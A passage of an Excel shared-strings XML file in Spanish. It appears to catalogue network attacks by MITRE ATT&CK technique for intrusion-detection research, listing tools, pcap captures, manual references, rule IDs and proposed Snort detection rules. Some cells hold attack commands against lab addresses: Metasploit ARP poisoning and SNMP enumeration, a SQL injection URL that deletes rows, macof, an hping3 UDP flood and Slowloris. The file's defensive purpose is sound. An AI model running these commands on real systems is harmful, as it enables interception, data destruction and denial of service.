        <sz val="11.0"/>
      </rPr>
      <t>19559</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 17317, 2003068, 2001219</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">650, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>19559</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 17317, 2003068, 2001219</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">650, 2003068, 2001219, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>19559</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 17317, 2002749, 2002752, 2036752, 2100650</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">650, 2003068, 2001219, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>19559</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 17317, 2002749, 2002752, 2036752, 2100650</t>
    </r>
  </si>
  <si>
    <t>Ataque sobre WPS</t>
  </si>
  <si>
    <t>wash, reaver</t>
  </si>
  <si>
    <t>T1110-Wps_[1].pcapng</t>
  </si>
  <si>
    <t>Manual [1] /  4.2.8</t>
  </si>
  <si>
    <t>Manual [1] / E.27</t>
  </si>
  <si>
    <t>Manual [4] / 4.1.34</t>
  </si>
  <si>
    <t>--</t>
  </si>
  <si>
    <t>Password Spraying</t>
  </si>
  <si>
    <t>T1110.003</t>
  </si>
  <si>
    <t>Ataque de fuerza bruta basado en diccionario de contraseñas</t>
  </si>
  <si>
    <t>wifite</t>
  </si>
  <si>
    <t>T1110-Diccionario_[1].pcapng</t>
  </si>
  <si>
    <t>Manual [1] /  4.2.7</t>
  </si>
  <si>
    <t>Manual [1] / E.26</t>
  </si>
  <si>
    <t>Manual [4] / 4.2.31</t>
  </si>
  <si>
    <t>NO (Ataque de L2)</t>
  </si>
  <si>
    <t>SI (paquetes con tamaño 0)</t>
  </si>
  <si>
    <t>Password Cracking</t>
  </si>
  <si>
    <t>T1110.002</t>
  </si>
  <si>
    <t>Ataque PMKID</t>
  </si>
  <si>
    <t>hashcat, hcxpcapngtool, hcxdumptool</t>
  </si>
  <si>
    <t>T1110-pmkid_[1].pcapng</t>
  </si>
  <si>
    <t>Manual [1] /  4.2.6.3</t>
  </si>
  <si>
    <t>Manual [1] / E.25</t>
  </si>
  <si>
    <t>Manual [4] / 4.2.32</t>
  </si>
  <si>
    <t>PTW/KoreK/FMS</t>
  </si>
  <si>
    <t>T1110-Ptw_korek_[1].pcapng</t>
  </si>
  <si>
    <t>Manual [1] /  4.2.5</t>
  </si>
  <si>
    <t>Manual [1] / E.24</t>
  </si>
  <si>
    <t>Manual [4] / 4.1.33</t>
  </si>
  <si>
    <t>Discovery</t>
  </si>
  <si>
    <t>Network Sniffing</t>
  </si>
  <si>
    <t>T1040</t>
  </si>
  <si>
    <t>Falsa autenticación</t>
  </si>
  <si>
    <t>T1040-Autenticacion_[1].pcapng</t>
  </si>
  <si>
    <t>No existe detección posible ante este tipo de ataques. El uso de cifrado WEP incorpora vulnerabilidades intrínsecas a este.</t>
  </si>
  <si>
    <t>Manual [1] /  4.2.1</t>
  </si>
  <si>
    <t>Manual [1] / E.20</t>
  </si>
  <si>
    <t>Manual [4] / 4.1.26</t>
  </si>
  <si>
    <t>Credential Acess</t>
  </si>
  <si>
    <t>ChopChop</t>
  </si>
  <si>
    <t>T1040-Chopchop_[1].pcapng</t>
  </si>
  <si>
    <t>Manual [1] /  4.2.2</t>
  </si>
  <si>
    <t>Manual [1] / E.21</t>
  </si>
  <si>
    <t>Manual [4] / 4.1.27</t>
  </si>
  <si>
    <t>Fragmentación</t>
  </si>
  <si>
    <t>T1040-Fragmentacion_[1].pcapng</t>
  </si>
  <si>
    <t>Manual [1] /  4.2.3</t>
  </si>
  <si>
    <t>Manual [1] / E.22</t>
  </si>
  <si>
    <t>Manual [4] / 4.1.28</t>
  </si>
  <si>
    <t>Inundación MAC</t>
  </si>
  <si>
    <t>T1040-Mac_flood_[1].pcapng</t>
  </si>
  <si>
    <t>Regla personalizada que detecte un envío masivo de mensajes IPv4 con direcciones incorreladas con la red a proteger, y que aparenten ser completamente aleatorias</t>
  </si>
  <si>
    <t>Manual [1] /  3.2</t>
  </si>
  <si>
    <t>Manual [1] / E.1</t>
  </si>
  <si>
    <t>Manual [4] / 4.1.29</t>
  </si>
  <si>
    <t>2013028, 50447</t>
  </si>
  <si>
    <t>50447, 2002749, 2100528, 2002752, 2013028, 2002824</t>
  </si>
  <si>
    <t>50447, 2100528, 2013028, 2002824</t>
  </si>
  <si>
    <t>Collection</t>
  </si>
  <si>
    <t>Adversary-in-the-Middle</t>
  </si>
  <si>
    <t>T1557</t>
  </si>
  <si>
    <t>ARP Cache Poisoning</t>
  </si>
  <si>
    <t>T1557.002</t>
  </si>
  <si>
    <t>Envenenamiento ARP</t>
  </si>
  <si>
    <t>Arpspoof</t>
  </si>
  <si>
    <t>T1557.002-ARP_poisoning1_[2].pcapng</t>
  </si>
  <si>
    <t>Envenenamiento de tablas ARP mediante Arpspoof.</t>
  </si>
  <si>
    <t>Manual [2] /  3.4.1.1</t>
  </si>
  <si>
    <t>2002752, 2002749, 2100472</t>
  </si>
  <si>
    <t>2002752, 2002749,2100472</t>
  </si>
  <si>
    <t>T1557.002-ARP_poisoning2_[3].pcapng</t>
  </si>
  <si>
    <t>Se realiza un ataque MITM, mediante el envenanamiento de las tablas de ARP caché de un equipo y su gateway. De esta toda se redirige todo el tráfico para que pase a través del equipo del atacante. Comando: msfconsole -x "use auxiliary/spoof/arp/arp_poisoning; set BIDIRECTIONAL true; set interface eth1; set DHOSTS 192.168.1.2; set SHOSTS 192.168.1.1; run -j -z; sleep 5; kill 0; exit"</t>
  </si>
  <si>
    <t>Manual [3] /  3.8.19</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.19</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.19.5</t>
  </si>
  <si>
    <t>Suplantación ARP</t>
  </si>
  <si>
    <t>arpspoof</t>
  </si>
  <si>
    <t>T1557-Arp_spoof_[1].pcapng</t>
  </si>
  <si>
    <t>Mediante el uso de preprocesadores, la detección de este ataque es posible estableciendo un asociación entre la IP a proteger y su dirección MAC correspondiente. De esta forma, se puede fundar una regla que detecte mensajes ARP que incumplen esta asociación y que avistan de un posible ataque por suplantación MAC</t>
  </si>
  <si>
    <t>Manual [1] / E.3</t>
  </si>
  <si>
    <t>2100469, 2100384, 2002752, 2002749, 2100366, 2100408</t>
  </si>
  <si>
    <t>2100384,2002752,2100366,2100469,2100408,2002749</t>
  </si>
  <si>
    <t>DHCP Spoofing</t>
  </si>
  <si>
    <t>T1557.003</t>
  </si>
  <si>
    <t>DHCPig, servidor DHCP</t>
  </si>
  <si>
    <t>T1557-Dhcp_spoofing_[1].pcapng</t>
  </si>
  <si>
    <t xml:space="preserve">Regla genérica que detecte un envío masivo de procedimientos DHCP completos (DISCOVERY, OFFER, REQUEST, ACK). Otra alternativa es una regla personalizada que analice mensajes DHCP ACK con direcciones IP de servidores DNS distinta a la establecida en la red </t>
  </si>
  <si>
    <t>Manual [1] /  2.4.2.1.2</t>
  </si>
  <si>
    <t>Manual [1] / E.19</t>
  </si>
  <si>
    <t>2100527, 2002749, 2002752</t>
  </si>
  <si>
    <t>2002752,2002749,2100527</t>
  </si>
  <si>
    <t>Agujero 196</t>
  </si>
  <si>
    <t>T1557-Hole196_[1].pcapng</t>
  </si>
  <si>
    <t>Manual [1] /  2.1.2.1.1</t>
  </si>
  <si>
    <t>Manual [1] / E.28</t>
  </si>
  <si>
    <t>Suplantación del puente raíz</t>
  </si>
  <si>
    <t>yersinia</t>
  </si>
  <si>
    <t>T1557-Puente_raiz_[1].pcapng</t>
  </si>
  <si>
    <t>Si el ataque viene seguido de suplantaciones ARP, con el uso de preprocesadores de Snort resulta posible su detección. En caso de que el ataque se centre únicamente en el establecimiento del atacante como puente raíz, no existe mecanismo de detección</t>
  </si>
  <si>
    <t>Establecimiento de atacante como puente raíz</t>
  </si>
  <si>
    <t>Manual [1] /  2.1.4.1.2</t>
  </si>
  <si>
    <t>Manual [1] / E.6</t>
  </si>
  <si>
    <t>2100366, 2100384, 2002752, 2002749, 2100408</t>
  </si>
  <si>
    <t>2100384, 2002752, 2100366, 2100408, 2002749</t>
  </si>
  <si>
    <t>Redirección</t>
  </si>
  <si>
    <t>ettercap, netwox</t>
  </si>
  <si>
    <t>T1557-Redireccion_[1].pcapng</t>
  </si>
  <si>
    <t xml:space="preserve">Regla personalizada que detecte envío de paquetes ICMP Redirect por parte de un equipo que no debería intervenir en labores de redirección </t>
  </si>
  <si>
    <t>Manual [1] /  2.2.2.1.3</t>
  </si>
  <si>
    <t>Manual [1] / E.8</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2100469, 2100384, 2002752, 2002749, 2100366, 2100408, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2100472</t>
    </r>
  </si>
  <si>
    <t>2100384, 2002752, 2100366, 2100469, 2100472, 2002749, 2100408</t>
  </si>
  <si>
    <t>Forced Authentication</t>
  </si>
  <si>
    <t>T1187</t>
  </si>
  <si>
    <t>Forzar intento de autenticación en un servidor para obtener credenciales de acceso</t>
  </si>
  <si>
    <t>SMB, NTLMssp-Extract</t>
  </si>
  <si>
    <t>T1187-Forced_Authentication_[5].pcapng</t>
  </si>
  <si>
    <t>Monitorizar tráfico SMB en puertos TCP 139,445, puerto UDP 137 y tráfico WebDAV</t>
  </si>
  <si>
    <t>Servidor SMB. El atacante captura el tráfico de red del intento de autenticación mediante Wireshark y aplica fuerza bruta a las credenciales capturadas</t>
  </si>
  <si>
    <t>Manual [5] /  3.5.5.1</t>
  </si>
  <si>
    <t>44486, 44484, 44488</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2002752, 2002749, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>44486, 44484, 44488</t>
    </r>
  </si>
  <si>
    <t>Cada instancia de ataque se corresponde con una solicitud al server SMB con el usuario y contraseñas en el paquete</t>
  </si>
  <si>
    <t xml:space="preserve"> T1187-Forced_Authentication2_[5].pcapng</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2002752, 2002749, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>44486, 44484, 44488</t>
    </r>
  </si>
  <si>
    <t>OS Credential Dumping</t>
  </si>
  <si>
    <t>T1003</t>
  </si>
  <si>
    <t>DCSync</t>
  </si>
  <si>
    <t>T1003.006</t>
  </si>
  <si>
    <t>Obtención de credenciales del usuario krbtgt (Usuario Kerberos Active Directory)</t>
  </si>
  <si>
    <t>mimikazt</t>
  </si>
  <si>
    <t>T1003-Os_credential_dumping_dcsync_[4].pcapng</t>
  </si>
  <si>
    <t>Regla compuesta que detecte una llamada DCERPC Bind a la API DRSUAPI seguida de una llamada a la función DsGetNCChanges</t>
  </si>
  <si>
    <t>Manual [4] /  3.11</t>
  </si>
  <si>
    <t>Manual [4] / B.11</t>
  </si>
  <si>
    <t>Manual [4] / 4.11</t>
  </si>
  <si>
    <t>TA0009</t>
  </si>
  <si>
    <t>Data from Configuration Repository</t>
  </si>
  <si>
    <t>T1602</t>
  </si>
  <si>
    <t>SNMP (MIB Dump)</t>
  </si>
  <si>
    <t>T1602.001</t>
  </si>
  <si>
    <t>Recogida MIB de un equipamiento</t>
  </si>
  <si>
    <t>T1602.001-MIB_Dump_[2].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte el uso del protocolo SNMP sobre UDP para acceder a la comunidad public</t>
  </si>
  <si>
    <t>Este ataque obtiene informacion de la MIB de un equipo mediante peticiones SNMP. Comando: msfconsole -x "use auxiliary/scanner/snmp/snmp_enum; set RHOSTS 192.168.2.2; run; exit"</t>
  </si>
  <si>
    <t>Manual [2] /  3.1.8.1</t>
  </si>
  <si>
    <t>Manual [2] / 4.2.1.10</t>
  </si>
  <si>
    <t>1411, 1417</t>
  </si>
  <si>
    <t>2101411, 1411, 1417</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2101411, 2101417</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2002752, 2002749, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>1411, 1417</t>
    </r>
  </si>
  <si>
    <t>2002752, 2101417, 2101411, 2002749</t>
  </si>
  <si>
    <t>Data from Information Repositories</t>
  </si>
  <si>
    <t>T1213</t>
  </si>
  <si>
    <t>T1213-SQL_inyection_[3].pcapng</t>
  </si>
  <si>
    <t>Robar informacion de la victima obteniendo el contenido guardado en una tabla SQL. Comando: SELECT * FROM tabla</t>
  </si>
  <si>
    <t>Manual [3] /  3.8.6</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.6.4</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.6.5</t>
  </si>
  <si>
    <t>Data from Network Shared Drive</t>
  </si>
  <si>
    <t>T1039</t>
  </si>
  <si>
    <t>Descarga de archivos de interés disponibles en una red compartida</t>
  </si>
  <si>
    <t>Comando Net Use</t>
  </si>
  <si>
    <t>T1039-Data_from_network_shared_drive_[4].pcapng</t>
  </si>
  <si>
    <t>Detección por anomalías, copia repentina de ficheros compartidos por red.</t>
  </si>
  <si>
    <t>Manual [4] /  3.15</t>
  </si>
  <si>
    <t>Manual [4] / B.15</t>
  </si>
  <si>
    <t>Manual [4] / 4.15</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>44489, 2002752, 2002749, 2044666</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2051116</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>44489, 2044666</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2051116</t>
    </r>
  </si>
  <si>
    <t>Email Collection</t>
  </si>
  <si>
    <t>T1114</t>
  </si>
  <si>
    <t>Remote Email Collection</t>
  </si>
  <si>
    <t>T1114.002</t>
  </si>
  <si>
    <t>Recolección de correos electrónicos de un servidor Microsoft Exchange haciendo uso de credenciales robadas</t>
  </si>
  <si>
    <t>PowerShell</t>
  </si>
  <si>
    <t>T1114-Email_collection_remote_email_collection_[4].pcapng</t>
  </si>
  <si>
    <t xml:space="preserve">Detección por anomalías, peticiones LDAP espontáneas desde un equipo de la red, haciendo uso de una cuenta con credenciales válidas. </t>
  </si>
  <si>
    <t>Manual [4] /  3.16</t>
  </si>
  <si>
    <t>Manual [4] / B.16</t>
  </si>
  <si>
    <t>Manual [4] / 4.16</t>
  </si>
  <si>
    <t>2002752, 2002749, 2044666, 2100628</t>
  </si>
  <si>
    <t>2044666, 2100628</t>
  </si>
  <si>
    <t>Impact</t>
  </si>
  <si>
    <t>TA0040</t>
  </si>
  <si>
    <t>Data Manipulation</t>
  </si>
  <si>
    <t>T1565</t>
  </si>
  <si>
    <t>Stored Data Manipulation</t>
  </si>
  <si>
    <t>T1565.001</t>
  </si>
  <si>
    <t>T1565.001-SQL_inyection_[3].pcapng</t>
  </si>
  <si>
    <t>Reglas personalizadas que detecten ataques de inyeccion SQL mediante la presencia del caracter "%27"</t>
  </si>
  <si>
    <t>El objetivo es generar daño en la BBDD. Queremos borrar lineas de una tabla. Comando: http://172.16.2.2:8080/contacto?apellidos=Fernandez%27;%20DELETE%20FROM%20contactos%20WHERE%20num=3--</t>
  </si>
  <si>
    <t>Manual [3] /  3.8.8</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.8.4</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.8.5</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">50447, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2006443</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">50447, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2006443</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2002752, 2002749, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2006443,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve"> 50447</t>
    </r>
  </si>
  <si>
    <t>2006443, 504</t>
  </si>
  <si>
    <t>Endpoint Denial of Service</t>
  </si>
  <si>
    <t>T1499</t>
  </si>
  <si>
    <t>OS Exhaustion Flood</t>
  </si>
  <si>
    <t>T1499.001</t>
  </si>
  <si>
    <t>Denegación de servicio a servidor web</t>
  </si>
  <si>
    <t>T1499.001-OS_Exhaustion_Flood_[3].pcapng</t>
  </si>
  <si>
    <t>Uso de metasploit para ataque DoS con herramienta Slowloris. Comando: use auxiliary/dos/http/slowloris</t>
  </si>
  <si>
    <t>Manual [3] /  3.8.16</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.16.4</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.16.5</t>
  </si>
  <si>
    <t>2012870, 40063</t>
  </si>
  <si>
    <t>2002752, 2002749, 2012870, 40063</t>
  </si>
  <si>
    <t>2012870, 401</t>
  </si>
  <si>
    <t>Application or System Exploitation</t>
  </si>
  <si>
    <t>T1499.004</t>
  </si>
  <si>
    <t>Suplantación MAC</t>
  </si>
  <si>
    <t>ip</t>
  </si>
  <si>
    <t>T1499-Mac_spoof_[1].pcapng</t>
  </si>
  <si>
    <t>Manual [1] /  2.1.1.1.2</t>
  </si>
  <si>
    <t>Manual [1] / E.2</t>
  </si>
  <si>
    <t>2100366, 2100384, 2002752, 2002749, 2100408, 2101620</t>
  </si>
  <si>
    <t xml:space="preserve">2002749, 2002752 </t>
  </si>
  <si>
    <t>2100366, 2100384, 2100408, 2101620</t>
  </si>
  <si>
    <t>Service Exhaustion Flood</t>
  </si>
  <si>
    <t>T1499.002</t>
  </si>
  <si>
    <t>Reseteo de Conexión</t>
  </si>
  <si>
    <t>ettercap, netwox, nping</t>
  </si>
  <si>
    <t>T1499-Reseteo_[1].pcapng</t>
  </si>
  <si>
    <t>Detección por anomalías que identifique reseteos de conexión periódicos y desde direcciones sospechosas</t>
  </si>
  <si>
    <t>Manual [1] /  2.3.1.1.6</t>
  </si>
  <si>
    <t>Manual [1] / E.12</t>
  </si>
  <si>
    <t>Inundación SYN con suplantación</t>
  </si>
  <si>
    <t>hping3</t>
  </si>
  <si>
    <t>T1499-Syn_suplantacion_[1].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte el envío prolongado de mensajes TCP SYN que dejan los sockets del equipo a proteger en estado SYN-RECV (no se terminan los handshake de las conexiones TCP establecidas)</t>
  </si>
  <si>
    <t>Manual [1] /  2.3.1.1.3</t>
  </si>
  <si>
    <t>Manual [1] / E.9</t>
  </si>
  <si>
    <t>LAND</t>
  </si>
  <si>
    <t>T1499-Land_[1].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte envío de mensajes TCP SYN procedentes de la misma dirección IP a la que van dirigidos los paquetes. Los puertos origen/destino pueden ser incluso idénticos</t>
  </si>
  <si>
    <t>Manual [1] /  2.3.1.1.5</t>
  </si>
  <si>
    <t>Manual [1] / E.11</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2100527, 2002752, 2002749, 2001579, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2001579</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2100527, 2001579, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2001579</t>
    </r>
  </si>
  <si>
    <t>Inundación DHCP / Inanición</t>
  </si>
  <si>
    <t>DHCPig, yersinia</t>
  </si>
  <si>
    <t>T1499-Dhcp_flood_[1].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte un envío masivo de procedimientos DHCP completos (DISCOVERY, OFFER, REQUEST, ACK)</t>
  </si>
  <si>
    <t>Manual [1] /  2.4.2.1.1</t>
  </si>
  <si>
    <t>Manual [1] / E.18</t>
  </si>
  <si>
    <t>Manual [4] / 4.1.39</t>
  </si>
  <si>
    <t>Reflexión SYN-ACK</t>
  </si>
  <si>
    <t>T1499-Reflexion_synack_[1].pcapng</t>
  </si>
  <si>
    <t>Regla que detecte el envío de mensajes TCP SYN-ACK no solicitados previamente por el la red a proteger</t>
  </si>
  <si>
    <t>Manual [1] /  3.4.2</t>
  </si>
  <si>
    <t>Manual [1] / E.10</t>
  </si>
  <si>
    <t>NO                                                                 (el propio ataque consiste en el envío de peticiones incompletas al servidor)</t>
  </si>
  <si>
    <t>Envio solicitudes HTTP a baja tasa</t>
  </si>
  <si>
    <t>Slowhttptest</t>
  </si>
  <si>
    <t>T1499.02-Slowhttptest-C2018_[6].pcapng</t>
  </si>
  <si>
    <t>Regla que detecte el envío de mensajes HTTP a baja tasa</t>
  </si>
  <si>
    <t>Uso de Slowhttptest para denegación de servicio a servidor web</t>
  </si>
  <si>
    <t>2002749, 2</t>
  </si>
  <si>
    <t>Envio solicitudes HTTP parciales</t>
  </si>
  <si>
    <t>Slowloris</t>
  </si>
  <si>
    <t>T1499.02-Slowloris-C2018_[6].pcapng</t>
  </si>
  <si>
    <t>Regla que detecte el envío de mensajes HTTP parciales o uso de Slowloris</t>
  </si>
  <si>
    <t>Uso de Slowloris para denegación de servicio a servidor web</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>15578</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 2002749, 2002752</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>15578</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 2002749, 2002752</t>
    </r>
  </si>
  <si>
    <t>.</t>
  </si>
  <si>
    <t>Application Exhaustion Flood</t>
  </si>
  <si>
    <t>T1499.003</t>
  </si>
  <si>
    <t>Hulk</t>
  </si>
  <si>
    <t>T1499.03-Hulk-C2018_[6].pcapng</t>
  </si>
  <si>
    <t xml:space="preserve"> Reglas que detecen envío masivo de solicitudes a servidor web</t>
  </si>
  <si>
    <t>Uso de Hulk para denegación de servicio a servidor web</t>
  </si>
  <si>
    <t>2002192, 2002749, 2002752, 2002822, 2012801, 2012914</t>
  </si>
  <si>
    <t>GoldenEye</t>
  </si>
  <si>
    <t>T1499.03-GoldenEye-C2018_[6].pcapng</t>
  </si>
  <si>
    <t>Uso de GoldenEye para denegación de servicio a servidor web</t>
  </si>
  <si>
    <t>2002749, 2002752, 2106897</t>
  </si>
  <si>
    <t>Network Denial of Service</t>
  </si>
  <si>
    <t>T1498</t>
  </si>
  <si>
    <t>Direct Network Flood</t>
  </si>
  <si>
    <t>T1498.001</t>
  </si>
  <si>
    <t>Inundación tabla MAC</t>
  </si>
  <si>
    <t>Macof</t>
  </si>
  <si>
    <t>T1498.001-MAC_table_flood_[3].pcapng</t>
  </si>
  <si>
    <t>Inundacion tabla MAC mediante Macof. Comando: sudo macof -i enp0s9 -d 172.16.1.1</t>
  </si>
  <si>
    <t>Manual [3] /  3.8.18</t>
  </si>
  <si>
    <t>Manual [3] / 3.18.4</t>
  </si>
  <si>
    <t>Manual [3] / 3.18.5</t>
  </si>
  <si>
    <t>2101917, 2002749, 2002752, 2100528, 1917</t>
  </si>
  <si>
    <t>2002752, 2002749, 2101917</t>
  </si>
  <si>
    <t>2100528, 192</t>
  </si>
  <si>
    <t>Inundación UDP</t>
  </si>
  <si>
    <t>Low Orbit Ion Canon (LOIC) for UDP, TCP, or HTTP requests</t>
  </si>
  <si>
    <t>T1498.001-UDP_flood_1-C2018_[6].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte un envío masivo de mensajes UDP con destino el mismo puerto objetivo</t>
  </si>
  <si>
    <t>402, 2002749, 2100402, 2002752</t>
  </si>
  <si>
    <t>2002749, 2002752, 2100402</t>
  </si>
  <si>
    <t>T1498.001-UDP_flood_2-C2018_[6].pcapng</t>
  </si>
  <si>
    <t>2002749, 2002752, 2100402, 2100525, 402</t>
  </si>
  <si>
    <t>2100402, 2100525, 402</t>
  </si>
  <si>
    <t>Inundación HTTP</t>
  </si>
  <si>
    <t>T1498.001-HTTP_flood-C2018_[6].pcapng</t>
  </si>
  <si>
    <t>Regla que detecte envío masivo de mensajes HTTP</t>
  </si>
  <si>
    <t>Manual [4] / B.37</t>
  </si>
  <si>
    <t>Inundación TCP</t>
  </si>
  <si>
    <t>T1498.001-TCP_flood-C2018_[6].pcapng</t>
  </si>
  <si>
    <t>Regla que detecte envío masivo de mensajes TCP</t>
  </si>
  <si>
    <t>50447, 2002749, 2002752</t>
  </si>
  <si>
    <t xml:space="preserve">  Caldera, hping3</t>
  </si>
  <si>
    <t>T1498.001-UDP_flood_[2].pcapng</t>
  </si>
  <si>
    <t>Inundacion UDP en la red de la víctima. Comando: timeout 10s hping3 --udp --flood 192.168.2.2</t>
  </si>
  <si>
    <t>Manual [2] /  3.1.10.2</t>
  </si>
  <si>
    <t>2100525, 2002752, 2002749, 2100402, 402</t>
  </si>
  <si>
    <t>2002752, 2100402, 2002749</t>
  </si>
  <si>
    <t>2100525, 402</t>
  </si>
  <si>
    <t>Reflection Amplification</t>
  </si>
  <si>
    <t>T1498.002</t>
  </si>
  <si>
    <t>Amplificación DNS</t>
  </si>
  <si>
    <t>dnsdrdos</t>
  </si>
  <si>
    <t>T1498-Amplif_dns_[1].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte un envío masivo de respuestas DNS no solicitadas con un mismo nombre resuelto hacia la red protegida</t>
  </si>
  <si>
    <t>Manual [1] /  3.5.1</t>
  </si>
  <si>
